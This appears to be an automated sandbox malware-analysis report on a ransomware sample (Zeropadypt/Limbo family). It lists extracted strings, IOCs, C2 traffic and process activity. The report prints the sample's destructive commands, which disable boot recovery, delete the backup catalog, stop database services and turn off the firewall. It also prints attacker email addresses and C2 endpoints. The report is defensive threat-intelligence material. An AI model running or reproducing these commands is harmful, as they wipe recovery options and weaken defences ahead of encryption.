Property.Property='%s'MsiViewExecute()MsiGetRecordString()GetCurrentUserSID(): LookupAccountName() failed @1st time call.GetCurrentUserSID():failed to allocate memory for pSid.GetCurrentUserSID():failed to allocate memory for wsDomainName.GetCurrentUserSID():LookupAccountName() failed.GetCurrentUserSID():ConvertSidToStringSid() failed.thsnYaVieBodaEncrypted by Adobe.0123456789ABCDEFEncryption failed.failed to copy command line into SM: command line: ARM update folder: session id: failed to get session id: unable to create SMEmpty Command Line or User NameGetFinalCommandLineForSM...1.701.999.9999unable to determine service version: installed service is legacy version /Svc /USER:cmd line limit reached for legacy service: final cmd line limit is reached: final cmd line for arm next service: \Adobe\ARM\1.0\armsvc.exefound service version: IsAnyProductInFullAuto...{A6EADE66-0000-0000-484E-7E8A45000000};{AC76BA86-0000-0000-7760-7E8A45000000};{AC76BA86-0000-0000-BA7E-7E8A45000000}policy disabled for: eula not accepted for: in found full auto for: in Modefound product in full auto: Comctl32LoadIconMetricServer to set iNotify value in HKEY_CURRENT_USER: Server (RegSetValueEx) failed to set iNotify value in HKEY_CURRENT_USERServer (RegOpenKeyEx) failed to set iNotify value in HKEY_CURRENT_USERIsHighBeamAllowed...allowed version list emptyinstalled version: confirmed allowed versionallowed version not confirmedunable to determine version: missing: Entered WaitForEvent Event signaledEvent timed outEvent wait failedIDS_TOOLTIP_MODE_FILES_IN_USEnot ignorable file is in use, will try to Upgrade laterCannot start Upgrade - not appropriate mode or MSI busyAttemptUpgrade...already processedauto-upgrade not availablewill not attemp upgrade, will attempt upgrade when possible, WaitFilesInUse in progressmode is not MODE_UPGRADES_FOUNDGetAutoUpgradeStatus...returning auto upgrade status: not MODE_UPGRADES_FOUND modeInitAutoUpgradeDaysRemaining... already initializedSetRegKeyDW failed - SetRegKeyDW succeeded - autoupgradeclockstartedProcessOptOutOrRemindMeLater...will not dismiss, will not dismiss - not appropriate modeping: http://armmf.adobe.com/arm-manifests/win/empty version in ping url.txtfailed to get Temp folderping result: JO,CXPathSelectionLanguageNewParserAllowXsltScriptAllowDocumentFunctionHJ?CJCCCC|JCCCC3)6{O>`3)6{O>`3)6{O>`j_@2Q2Q!i_@2Qi_@2QQ!s.OhJ*E*ECCF''*[local-name(.) = '%s']child::*3)6{O>`3)6{O>`Y@H`JJRSDSD|Kq1D:\CB\ARM_Main\BuildResults\bin\Win32\Release\AdobeARM.pdbJIIIJLJJ@IJ I0I@IJLJJ@ IJpIII@IJLJJ@pI0JIII@IJLJ0J@IXJI(I<I@IJLJXJ@IJlI|IIIJ@lIJ@IIIJIIILJJ@ITJ8IHITILJTJ@8IKJJIIILJJ@I JIII J@IK4JTJ@IPI\ILJTJ@@IJIII@IJLJJ@IJIII@IJLJJ@IJ4IDIPILJJ@4IJIIIPILJJ@I,JIIIPILJ,J@IJ I0I8IJ@ IJhIxIIJ@hIKJ,JIIII,J@IPJ@I(IIpJDITI`IIpJ@DIIIIIlIIIJ@|IJ@IIII8IJ@I,II8IJ@TIdI8IJBTI J@III8I J@IJBTI@JIIPIlIIPIIIIlIIIlII@J@IxJ" - source
- File/Memory
- relevance
- 1/10
-
Creates mutants
- details
-
"\Sessions\1\BaseNamedObjects\RasPbFile"
"\Sessions\1\BaseNamedObjects\Global\3a886eb8-fe40-4d0a-b78b-9e0bcb683fb7"
"RasPbFile"
"Global\3a886eb8-fe40-4d0a-b78b-9e0bcb683fb7" - source
- Created Mutant
- relevance
- 3/10
-
GETs files from a webserver
- details
-
"GET /ip-provider.php HTTP/1.0
content-length: 0
from: user@sfml-dev.org
host: www.sfml-dev.org
user-agent: libsfml-network/2.x" - source
- Network Traffic
- relevance
- 5/10
-
Overview of unique CLSIDs touched in registry
- details
-
"netsh.exe" touched "Nap Config Read class" (Path: "HKCU\WOW6432NODE\CLSID\{EA4A0A43-1C8F-4C7B-A4B1-28ECBD96BA8C}")
"netsh.exe" touched "Quarantine Agent Management class" (Path: "HKCU\WOW6432NODE\CLSID\{EB082BA1-DF8A-46BE-82F3-35BF9E9BE52F}")
"netsh.exe" touched "HNetCfg.FwMgr" (Path: "HKCR\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{304CE942-6E39-40D8-943A-B913C40C9CD4}") - source
- Registry Access
- relevance
- 3/10
-
Process launched with changed environment
- details
-
Process "cmd.exe" (Show Process) was launched with new environment variables: "PROCESSOR_ARCHITEW6432="AMD64""
Process "cmd.exe" (Show Process) was launched with modified environment variables: "CommonProgramFiles, PROCESSOR_ARCHITECTURE, ProgramFiles"
Process "net.exe" (Show Process) was launched with new environment variables: "PROMPT="$P$G""
Process "cmd.exe" (Show Process) was launched with missing environment variables: "PROMPT"
Process "net.exe" (Show Process) was launched with new environment variables: "PROMPT="$P$G""
Process "cmd.exe" (Show Process) was launched with missing environment variables: "PROMPT"
Process "net.exe" (Show Process) was launched with new environment variables: "PROMPT="$P$G""
Process "cmd.exe" (Show Process) was launched with missing environment variables: "PROMPT"
Process "net.exe" (Show Process) was launched with new environment variables: "PROMPT="$P$G""
Process "cmd.exe" (Show Process) was launched with missing environment variables: "PROMPT"
Process "netsh.exe" (Show Process) was launched with new environment variables: "PROMPT="$P$G""
Process "cmd.exe" (Show Process) was launched with missing environment variables: "PROMPT"
Process "netsh.exe" (Show Process) was launched with new environment variables: "PROMPT="$P$G""
Process "cmd.exe" (Show Process) was launched with missing environment variables: "PROMPT"
Process "net.exe" (Show Process) was launched with new environment variables: "PROMPT="$P$G""
Process "cmd.exe" (Show Process) was launched with missing environment variables: "PROMPT"
Process "net.exe" (Show Process) was launched with new environment variables: "PROMPT="$P$G""
Process "cmd.exe" (Show Process) was launched with missing environment variables: "PROMPT"
Process "net.exe" (Show Process) was launched with new environment variables: "PROMPT="$P$G""
Process "cmd.exe" (Show Process) was launched with missing environment variables: "PROMPT"
Process "net.exe" (Show Process) was launched with new environment variables: "PROMPT="$P$G"" - source
- Monitored Target
- relevance
- 10/10
-
Runs shell commands
- details
-
"%WINDIR%\system32\cmd.exe /c net stop MSDTC" on 2020-12-14.12:46:29.149
"%WINDIR%\system32\cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures" on 2020-12-14.12:46:29.493
"%WINDIR%\system32\cmd.exe /c bcdedit /set {default} recoveryenabled no" on 2020-12-14.12:46:29.665
"%WINDIR%\system32\cmd.exe /c wbadmin delete catalog -quiet" on 2020-12-14.12:46:29.805
"%WINDIR%\system32\cmd.exe /c net stop SQLSERVERAGENT" on 2020-12-14.12:46:29.946
"%WINDIR%\system32\cmd.exe /c net stop MSSQLSERVER" on 2020-12-14.12:46:30.321
"%WINDIR%\system32\cmd.exe /c net stop vds" on 2020-12-14.12:46:31.055
"%WINDIR%\system32\cmd.exe /c netsh advfirewall set currentprofile state off" on 2020-12-14.12:46:31.555
"%WINDIR%\system32\cmd.exe /c netsh firewall set opmode mode=disable" on 2020-12-14.12:47:13.102
"%WINDIR%\system32\cmd.exe /c net stop SQLWriter" on 2020-12-14.12:47:54.665
"%WINDIR%\system32\cmd.exe /c net stop SQLBrowser" on 2020-12-14.12:47:55.133
"%WINDIR%\system32\cmd.exe /c net stop MSSQLSERVER" on 2020-12-14.12:47:55.524
"%WINDIR%\system32\cmd.exe /c net stop MSSQL$CONTOSO1" on 2020-12-14.12:47:56.024 - source
- Monitored Target
- relevance
- 5/10
- ATT&CK ID
- T1059 (Show technique in the MITRE ATT&CK™ matrix)
-
Spawns new processes
- details
-
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c net stop MSDTC" (Show Process)
Spawned process "net.exe" with commandline "net stop MSDTC" (Show Process)
Spawned process "net1.exe" with commandline "%WINDIR%\system32\net1 stop MSDTC" (Show Process)
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c bcdedit /set {default} bootstatuspo ..." (Show Process)
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c bcdedit /set {default} recoveryenab ..." (Show Process)
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c wbadmin delete catalog -quiet" (Show Process)
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c net stop SQLSERVERAGENT" (Show Process)
Spawned process "net.exe" with commandline "net stop SQLSERVERAGENT" (Show Process)
Spawned process "net1.exe" with commandline "%WINDIR%\system32\net1 stop SQLSERVERAGENT" (Show Process)
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c net stop MSSQLSERVER" (Show Process)
Spawned process "net.exe" with commandline "net stop MSSQLSERVER" (Show Process)
Spawned process "net1.exe" with commandline "%WINDIR%\system32\net1 stop MSSQLSERVER" (Show Process)
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c net stop vds" (Show Process)
Spawned process "net.exe" with commandline "net stop vds" (Show Process)
Spawned process "net1.exe" with commandline "%WINDIR%\system32\net1 stop vds" (Show Process)
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c netsh advfirewall set currentprofi ..." (Show Process)
Spawned process "netsh.exe" with commandline "netsh advfirewall set currentprofile state off" (Show Process)
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c netsh firewall set opmode mode=disa ..." (Show Process)
Spawned process "netsh.exe" with commandline "netsh firewall set opmode mode=disable" (Show Process)
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c net stop SQLWriter" (Show Process) - source
- Monitored Target
- relevance
- 3/10
-
Spawns new processes that are not known child processes
- details
-
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c net stop MSDTC" (Show Process)
Spawned process "net.exe" with commandline "net stop MSDTC" (Show Process)
Spawned process "net1.exe" with commandline "%WINDIR%\system32\net1 stop MSDTC" (Show Process)
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c bcdedit /set {default} bootstatuspo ..." (Show Process)
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c bcdedit /set {default} recoveryenab ..." (Show Process)
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c wbadmin delete catalog -quiet" (Show Process)
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c net stop SQLSERVERAGENT" (Show Process)
Spawned process "net.exe" with commandline "net stop SQLSERVERAGENT" (Show Process)
Spawned process "net1.exe" with commandline "%WINDIR%\system32\net1 stop SQLSERVERAGENT" (Show Process)
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c net stop MSSQLSERVER" (Show Process)
Spawned process "net.exe" with commandline "net stop MSSQLSERVER" (Show Process)
Spawned process "net1.exe" with commandline "%WINDIR%\system32\net1 stop MSSQLSERVER" (Show Process)
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c net stop vds" (Show Process)
Spawned process "net.exe" with commandline "net stop vds" (Show Process)
Spawned process "net1.exe" with commandline "%WINDIR%\system32\net1 stop vds" (Show Process)
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c netsh advfirewall set currentprofi ..." (Show Process)
Spawned process "netsh.exe" with commandline "netsh advfirewall set currentprofile state off" (Show Process)
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c netsh firewall set opmode mode=disa ..." (Show Process)
Spawned process "netsh.exe" with commandline "netsh firewall set opmode mode=disable" (Show Process)
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c net stop SQLWriter" (Show Process) - source
- Monitored Target
- relevance
- 3/10
-
Contacts domains
-
Installation/Persistence
-
Dropped files
- details
-
"AutoIt3_x64.exe" has type "data"
"603jOLdO.exe" has type "data"
"AUDIOSEARCHMAIN.DLL" has type "data"
"5F7TBCLUxJG.doc" has type "data"
"AcroRd32.exe" has type "data"
"ACEWDAT.DLL" has type "data"
"Adobe AIR Application Installer.swf" has type "data"
"ant-javafx.jar" has type "data"
"AdobeCollabSync.exe" has type "data"
"AXSLE.dll" has type "data"
"AIDE.dll" has type "data"
"3LnBJn.doc" has type "data"
"ACE.dll" has type "data"
"awt.dll" has type "data"
"7zFM.exe" has type "data"
"4RHcGmkB.exe" has type "data"
"ACEDAO.DLL" has type "data"
"AdobeARM.exe" has type "data"
"ACEES.DLL" has type "data" - source
- Binary File
- relevance
- 3/10
-
Touches files in the Windows directory
- details
-
"Hiden_pro@aol.com.exe" touched file "%WINDIR%\Globalization\Sorting\SortDefault.nls"
"Hiden_pro@aol.com.exe" touched file "%WINDIR%\AppPatch\sysmain.sdb"
"Hiden_pro@aol.com.exe" touched file "%WINDIR%\SysWOW64\cmd.exe"
"cmd.exe" touched file "%WINDIR%\SysWOW64\en-US\cmd.exe.mui"
"cmd.exe" touched file "%WINDIR%\AppPatch\sysmain.sdb"
"cmd.exe" touched file "%WINDIR%\SysWOW64\net.exe"
"cmd.exe" touched file "%WINDIR%\Globalization\Sorting\SortDefault.nls"
"net.exe" touched file "%WINDIR%\AppPatch\sysmain.sdb"
"net.exe" touched file "%WINDIR%\SysWOW64\net1.exe" - source
- API Call
- relevance
- 7/10
-
Dropped files
-
Network Related
-
Found potential URL in binary/memory
- details
-
Pattern match: "www.sfml-dev.org"
Heuristic match: "user@sfml-dev.org"
Pattern match: "https://curl.haxx.se/docs/http-cookies.html"
Heuristic match: "ftp@example.com"
Pattern match: "https://pastebin.com/raw/E1MURCfS"
Heuristic match: "Hiden_pro@aol.com"
Heuristic match: "Hiden_pro@tutanota.com"
Pattern match: "https://www.kaspersky.com/content/en-global/images/repository/isc/2017-images/encryption.jpg"
Pattern match: "https://www.iconsdb.com/icons/preview/red/lock-xxl.png"
Heuristic match: "pastebin.com"
Pattern match: "nX.FbNl/HM8G/vz4_9m|36as\5"
Heuristic match: "v-.AI"
Pattern match: "armmf.adobe.com/arm-manifests/win/http://www.adobe.com/support/downloads/product.jsp?product=1&platform=Windowshttp://www.adobe.com/support/downloads/product.jsp?product=10&platform=WindowsSOFTWARE\Adobe\Adobe"
Pattern match: "www.adobe.com/go/update_error_winrelaunched"
Pattern match: "get.adobe.com/reader/Auto_Upgrade_Statusupgradeoffered2autoupgradeeligible2IDS_TITLE_GET_UPGRADE_NAMEIDS_TITLE_REASONS_TO_UPGRADEIDS_TITLE_UPGRADE_HIGHLIGHTSIDS_UPGRADE_REASONS_HIGHLIGHTSIDS_UPGRADE_HIGHLIGHTS"
Pattern match: "OverwriteURLs.com/ArmReport.ini[SESSION]Delete_ReportMoveEx_ReportSESSIONJ#ASOFTWARE\Adobe\Adobe"
Pattern match: "www.adobe.com/go/ARMUpgradeFailedHelpUpgrade_WhatsNewopenThe"
Pattern match: "http://armmf.adobe.com/arm-manifests/win/empty"
Pattern match: "T.Wwz/IYXW:}I-2+|asx+|gck"
Pattern match: "G-i27p.ni/w2SYi"
Pattern match: "Pu.Lt/%}HR*&P[ZPw5"
Pattern match: "uHa.If/p6&3KzGE99a"
Heuristic match: "#all{/I1wtZ2tBxZJ6..kP"
Heuristic match: "&\g[8'5TRdriWL`MM.(-\p)#]e_YF(g+D2,7(2)~}.rs"
Heuristic match: "qaYC&D$&o<n(mecMQq}?dI_wX55KKletPVt/@%w6(8Q|g_o(nDR(,L>.Gh"
Pattern match: "9.Hu/pX`Y"
Pattern match: "T.vPh/hnR"
Heuristic match: "4LfK(cGVmlo=QECn~9u3&Yt.bG"
Heuristic match: "H+|.je"
Heuristic match: "Y_^M3H]UjhQdP V3EVWPEdEjPqAjjjp0tnj#h8RMEEE;}EuCEjVPWE\0u3VjMEQPC0}ruk.Md"
Heuristic match: "Y_^[M3<]UjhQdP,V3ESVWPEdu~u_2~rjPj7WtPt=03hPfPD3fjPVSCRjjEP`C3+tftfJuuz3fxHPxTRt7h&ThPUxRjjP`r.Md"
Pattern match: "ChromeSandboxLaunch.cpp/prefetch:1/n/prefetch:2prochelperprocpid/CR"
Pattern match: "verclsid.exeverclsid.exe/S/C/I/XIMEPADSV.EXEEmbeddingimjpuex.exeimjpdct.exeifSharedPathModulePathSOFTWARE\Microsoft\IMEJPSOFTWARE\Microsoft\IMEJP\%s\directories\ime\sharedCreateProcessWAction"
Pattern match: "acrobatoauth.adobe.com/delegation_endSuccessError*.adobe.com*.acrobat.com*.adobelogin.comredirect_uriHTMLROOTWINDOWhttps://acrobatoauth.adobe.com/delegation_starthttps://acrobatoauth.adobe.com/delegation_errordelegationfacebookfacebookgooglegoogle,+?X@BAU`"
Pattern match: "C-gQsXQgD.gmS/`;4"
Pattern match: "BG.BD/lLMp86J;fo,{WeN2sJs"
Pattern match: "uKK6cpcO-0BwJWoC.hr/OuD3JHOp:$vatZFZBpg"
Pattern match: "j7aA.YR/&[l"
Pattern match: "otrH.oaZ/M]BCx2A_jM{`$aP"
Pattern match: "bZ9EQ.Qeht/2s=FmM"
Pattern match: "O-1Rz.kK/tVeDA&wWro"
Pattern match: "uH-tH.tH/tH0tH1tH2htH9PtH=@tH"
Pattern match: "www.7-zip.org/U"
Pattern match: "http://schemas.microsoft.com/SMI/2005/WindowsSettings" - source
- File/Memory
- relevance
- 10/10
-
Found potential URL in binary/memory
-
System Security
-
Creates or modifies windows services
- details
-
"netsh.exe" (Access type: "CREATE"; Path: "HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\NAPAGENT\LOCALCONFIG")
"netsh.exe" (Access type: "CREATE"; Path: "HKLM\SYSTEM\CONTROLSET001\SERVICES\NAPAGENT\LOCALCONFIG\ENROLL\HCSGROUPS")
"netsh.exe" (Access type: "CREATE"; Path: "HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\NAPAGENT\SHAS")
"netsh.exe" (Access type: "CREATE"; Path: "HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\NAPAGENT\QECS")
"netsh.exe" (Access type: "CREATE"; Path: "HKLM\SYSTEM\CONTROLSET001\SERVICES\NAPAGENT\LOCALCONFIG\UI") - source
- Registry Access
- relevance
- 10/10
- ATT&CK ID
- T1112 (Show technique in the MITRE ATT&CK™ matrix)
-
Opens the Kernel Security Device Driver (KsecDD) of Windows
- details
- "netsh.exe" opened "\Device\KsecDD"
- source
- API Call
- relevance
- 10/10
- ATT&CK ID
- T1215 (Show technique in the MITRE ATT&CK™ matrix)
-
Creates or modifies windows services
-
Unusual Characteristics
-
Matched Compiler/Packer signature
- details
- "aa4dd8fe831e364b70b4315620bb99ef894a615e3fcdd089968cbc77f9cb73cc.bin" was detected as "VC8 -> Microsoft Corporation"
- source
- Static Parser
- relevance
- 10/10
- ATT&CK ID
- T1045 (Show technique in the MITRE ATT&CK™ matrix)
-
Reads information about supported languages
- details
-
"net.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000409")
"net1.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000409") - source
- Registry Access
- relevance
- 3/10
- ATT&CK ID
- T1012 (Show technique in the MITRE ATT&CK™ matrix)
-
Matched Compiler/Packer signature
File Details
Hiden_pro@aol.com.exe
- Filename
- Hiden_pro@aol.com.exe
- Size
- 1.3MiB (1342464 bytes)
- Type
- peexe executable
- Description
- PE32 executable (console) Intel 80386, for MS Windows
- Architecture
- WINDOWS
- SHA256
- aa4dd8fe831e364b70b4315620bb99ef894a615e3fcdd089968cbc77f9cb73cc
- MD5
- f9b408142389fc05540df4fea96d6fbf
- SHA1
- db3bafb7e737b11bf300a3f0bdf780ad0d11fe6c
- ssdeep
- 24576:OVIxznTfNlbZ91iI/GhHE5UEL9v9tJu4BAkeOdb+AYBPTBuoZlP6Qr2Y:1xFfiwGW5UKg1FFB6ol
- imphash
- 6fe1a71a390c8ad376ecc9d5cc58c394
- authentihash
- bfc661c245cf38ab6b42dd3c4eca4d3b99fcdae0646eeaee99c394d2ebd72858
- Compiler/Packer
- VC8 -> Microsoft Corporation
- PDB Timestamp
- 12/04/2020 18:24:00 (UTC)
- PDB Pathway
- C:\Users\Legion\source\repos\curl\Release\curl.pdb
- PDB GUID
- E76AC7A672494CC99BCBB2DF2425F641
Classification (TrID)
- 61.7% (.EXE) Win64 Executable (generic)
- 14.7% (.DLL) Win32 Dynamic Link Library (generic)
- 10.0% (.EXE) Win32 Executable (generic)
- 4.5% (.EXE) OS/2 Executable (generic)
- 4.4% (.EXE) Generic Win/DOS Executable
File Metadata
- 1 .OBJ Files (COFF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 27027)
- 1 .BAS Files compiled with C2.EXE 5.0 (Visual Basic 6) (build: 27027)
- 13 .LIB Files generated with LIB.EXE 9.00 (Visual Studio 2008) (build: 30729)
- 51 .OBJ Files (OMF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 27508)
- 107 .OBJ Files (COFF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 27508)
- 37 .OBJ Files (COFF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 26706)
- 131 .OBJ Files (OMF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 26706)
- 26 .OBJ Files (OMF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 26706)
- 6 .OBJ Files linked with ALIASOBJ.EXE 11.00 (Internal OLDNAMES.LIB Tool) (build: 41118)
- File contains Visual Basic code
- File appears to contain raw COFF/OMF content
- File is the product of a small codebase (1 files)
File Sections
Details | ||||||
---|---|---|---|---|---|---|
File Resources
Details | ||||
---|---|---|---|---|
File Imports
Screenshots
Loading content, please wait...
Hybrid Analysis
Tip: Click an analysed process below to view more details.
Analysed 32 processes in total (System Resource Monitor).
-
Hiden_pro@aol.com.exe
(PID: 2872)
44/67
- cmd.exe %WINDIR%\system32\cmd.exe /c net stop MSDTC (PID: 3044)
- cmd.exe %WINDIR%\system32\cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures (PID: 3100)
- cmd.exe %WINDIR%\system32\cmd.exe /c bcdedit /set {default} recoveryenabled no (PID: 2640)
- cmd.exe %WINDIR%\system32\cmd.exe /c wbadmin delete catalog -quiet (PID: 1020)
- cmd.exe %WINDIR%\system32\cmd.exe /c net stop SQLSERVERAGENT (PID: 3368)
- cmd.exe %WINDIR%\system32\cmd.exe /c net stop MSSQLSERVER (PID: 3384)
- cmd.exe %WINDIR%\system32\cmd.exe /c net stop vds (PID: 2468)
-
cmd.exe
%WINDIR%\system32\cmd.exe /c netsh advfirewall set currentprofile state off
(PID: 3144)
- netsh.exe netsh advfirewall set currentprofile state off (PID: 2424)
-
cmd.exe
%WINDIR%\system32\cmd.exe /c netsh firewall set opmode mode=disable
(PID: 2796)
- netsh.exe netsh firewall set opmode mode=disable (PID: 3124)
- cmd.exe %WINDIR%\system32\cmd.exe /c net stop SQLWriter (PID: 1076)
- cmd.exe %WINDIR%\system32\cmd.exe /c net stop SQLBrowser (PID: 872)
- cmd.exe %WINDIR%\system32\cmd.exe /c net stop MSSQLSERVER (PID: 1436)
- cmd.exe %WINDIR%\system32\cmd.exe /c net stop MSSQL$CONTOSO1 (PID: 1320)
Network Analysis
DNS Requests
Domain | Address | Registrar | Country |
---|---|---|---|
pastebin.com
OSINT |
104.23.99.190
TTL: 22 |
ENOM, INC.
Organization: WHOISGUARD, INC. Name Server: SUE.NS.CLOUDFLARE.COM Creation Date: Tue, 03 Sep 2002 00:00:00 GMT |
United States |
www.sfml-dev.org
OSINT |
78.47.82.133
TTL: 1199 |
united-domains AG
Organization: Limbozz GmbH Name Server: PRI.MORDAC.DE Creation Date: Tue, 26 Feb 2008 15:26:15 GMT |
Germany |
Contacted Hosts
IP Address | Port/Protocol | Associated Process | Details |
---|---|---|---|
78.47.82.133 |
80
TCP |
hiden_pro@aol.com.exe PID: 2872 |
Germany |
104.23.99.190 |
443
TCP |
hiden_pro@aol.com.exe PID: 2872 |
United States |
94.130.46.250 |
8080
TCP |
hiden_pro@aol.com.exe PID: 2872 |
Germany |
Contacted Countries
HTTP Traffic
Endpoint | Request | URL | |
---|---|---|---|
78.47.82.133:80 | GET | 78.47.82.133/ip-provider.php | GET /ip-provider.php HTTP/1.0
content-length: 0
from: user@sfml-dev.org
host: www.sfml-dev.org
user-agent: libsfml-network/2.x More Details |
94.130.46.250:8080 | POST | 94.130.46.250/1614CEEEC50A9336EBF690886CAA747D6811C45D37086A3FA7B11C9E83926C6C | POST /1614CEEEC50A9336EBF690886CAA747D6811C45D37086A3FA7B11C9E83926C6C HTTP/1.1
connection: close
content-length: 1716
content-type: application/x-www-form-urlencoded
from: me
host: 94.130.46.250
user-agent: libsfml-network/2.x More Details |
Suricata Alerts
Event | Category | Description | SID |
---|---|---|---|
local -> 78.47.82.133:80 (TCP) | A Network Trojan was detected | ET USER_AGENTS SFML User-Agent (libsfml-network) | 2026914 |
local -> 78.47.82.133:80 (TCP) | Device Retrieving External IP Address Detected | ETPRO POLICY External IP Address Lookup via libsfml-network | 2838021 |
local -> 94.130.46.250:8080 (TCP) | A Network Trojan was detected | ET USER_AGENTS SFML User-Agent (libsfml-network) | 2026914 |
local -> 94.130.46.250:8080 (TCP) | Malware Command and Control Activity Detected | ETPRO MALWARE Zeropadypt/Limbo/Ouroboros Ransomware CnC Checkin M4 | 2839873 |
local -> 94.130.46.250:8080 (TCP) | Potentially Bad Traffic | ETPRO INFO HTTP Request with Lowercase connection Header Observed | 2838131 |
Extracted Strings
Extracted Files
Displaying 37 extracted file(s). The remaining 1027 file(s) are available in the full version and XML/JSON reports.
-
Informative Selection 1
-
-
1
- Size
- 4.9MiB (5146674 bytes)
- Type
- data
- Runtime Process
- Hiden_pro@aol.com.exe (PID: 2872)
- MD5
- 49b9e7152f713225c7cf1408c505bb3e
- SHA1
- d9a2d86132795058c1bc4de1b6f775295f920cbb
- SHA256
- 7c0d217b198fd0d66be20ed83448c342764132600a168ce26944f3bb98e37453
-
-
Informative 36
-
-
AutoIt3_x64.exe
- Size
- 1MiB (1058355 bytes)
- Type
- data
- Runtime Process
- Hiden_pro@aol.com.exe (PID: 2872)
- MD5
- 2a6dbcc4046d9ba7d8256c28e481e3e2
- SHA1
- 9901f832e6191f4a4456c59d99879c422466b0d9
- SHA256
- dabd5a53d95a09b8ba7490c5faa213fba0136f284d7d0e0ecb7c146bb259e5e5
-
603jOLdO.exe
- Size
- 4.3MiB (4516099 bytes)
- Type
- data
- Runtime Process
- Hiden_pro@aol.com.exe (PID: 2872)
- MD5
- e210bbd19872fb1fb403d14b7681672d
- SHA1
- 51406bc923adfadf192d6058d6aac5f53ad75db6
- SHA256
- 5f80ae45c7ee2b517157a29f96a5398d79ec23fd95c96c2d49570125274a1d69
-
AUDIOSEARCHMAIN.DLL
- Size
- 1.6MiB (1668219 bytes)
- Type
- data
- Runtime Process
- Hiden_pro@aol.com.exe (PID: 2872)
- MD5
- 792109ad1c2ac6e4cae349bb33f1261f
- SHA1
- 1c7c2b4217b29ad8527909eab29b42e3efa0e64a
- SHA256
- 7f04221ad3ecfbb3dbb6198a7b68c663181bebee8f124a3b8b272aea9d8bfccf
-
5F7TBCLUxJG.doc
- Size
- 4.2MiB (4387075 bytes)
- Type
- data
- Runtime Process
- Hiden_pro@aol.com.exe (PID: 2872)
- MD5
- 9e9c19492efd26b8bce6aa39805a2c2b
- SHA1
- 0044efba3352427aa5d3d9b06d53e39480df1231
- SHA256
- a0c02822e312629b6a54118780d4580b2e8e213115b8a4c2bc6e66d44700624a
-
AcroRd32.exe
- Size
- 2.1MiB (2227955 bytes)
- Type
- doc office
- Description
- data
- Runtime Process
- Hiden_pro@aol.com.exe (PID: 2872)
- MD5
- 23a71c254c2d9c0ddefe8d327b2fd359
- SHA1
- 86d2024fb2fe1c44397baf4cf383e65d02686327
- SHA256
- 6620658f934f360c5a09eb66cfd7aa9339eb598a80ba6c8fdd62b53e342627d1
-
ACEWDAT.DLL
- Size
- 2.9MiB (3051171 bytes)
- Type
- data
- Runtime Process
- Hiden_pro@aol.com.exe (PID: 2872)
- MD5
- 7796940cb224c268da6261eb3ecc02d6
- SHA1
- e46476be9387257dff0b5955236dcf1fd1f795b3
- SHA256
- fccc8f0351244bd42ee2f98f62610b51c8feb1d712255c351059dc1c2675945e
-
Adobe AIR Application Installer.swf
- Size
- 714KiB (731541 bytes)
- Type
- data
- Runtime Process
- Hiden_pro@aol.com.exe (PID: 2872)
- MD5
- 5a22c3f2f9ea817a0829f8d5a7a41a9e
- SHA1
- b94e4d213901e634b595ec73181156d9d820d6d9
- SHA256
- dfdaf740f4e1e6ac366f4a823ee5e693fe88464e09c041e4d3ac46a66248c694
-
ant-javafx.jar
- Size
- 1.4MiB (1419574 bytes)
- Type
- data
- Runtime Process
- Hiden_pro@aol.com.exe (PID: 2872)
- MD5
- 5f062d7661e66478e17a317e1c966df1
- SHA1
- 797fa7ae61313cb00a7101deaad70787399364a9
- SHA256
- bf1288c97ffcaf77b4acd17df20dc397ca8407176b847bdbb6adf08a12802f54
-
AdobeCollabSync.exe
- Size
- 866KiB (887027 bytes)
- Type
- data
- Runtime Process
- Hiden_pro@aol.com.exe (PID: 2872)
- MD5
- 9743f89e0e400dc5bfd293d2b2cc3f7b
- SHA1
- 75db4c14e4dd8d05695c17c9549e5655d2ee0af1
- SHA256
- 3bd1b42c867ddf332cd0ecea7f7e7921a3afd65688bc29518ea0a2679bc191b5
-
AXSLE.dll
- Size
- 611KiB (625395 bytes)
- Type
- data
- Runtime Process
- Hiden_pro@aol.com.exe (PID: 2872)
- MD5
- dd3854eeffe5b3eb9e0dbd86b9675112
- SHA1
- 59139abe6abf970ac8761829cf237d8e62c1a177
- SHA256
- ff7075a4bc9e6b70250a2d53cf8910995b14f23773df5effa9cd3769a3288eae
-
AIDE.dll
- Size
- 1.1MiB (1142099 bytes)
- Type
- data
- Runtime Process
- Hiden_pro@aol.com.exe (PID: 2872)
- MD5
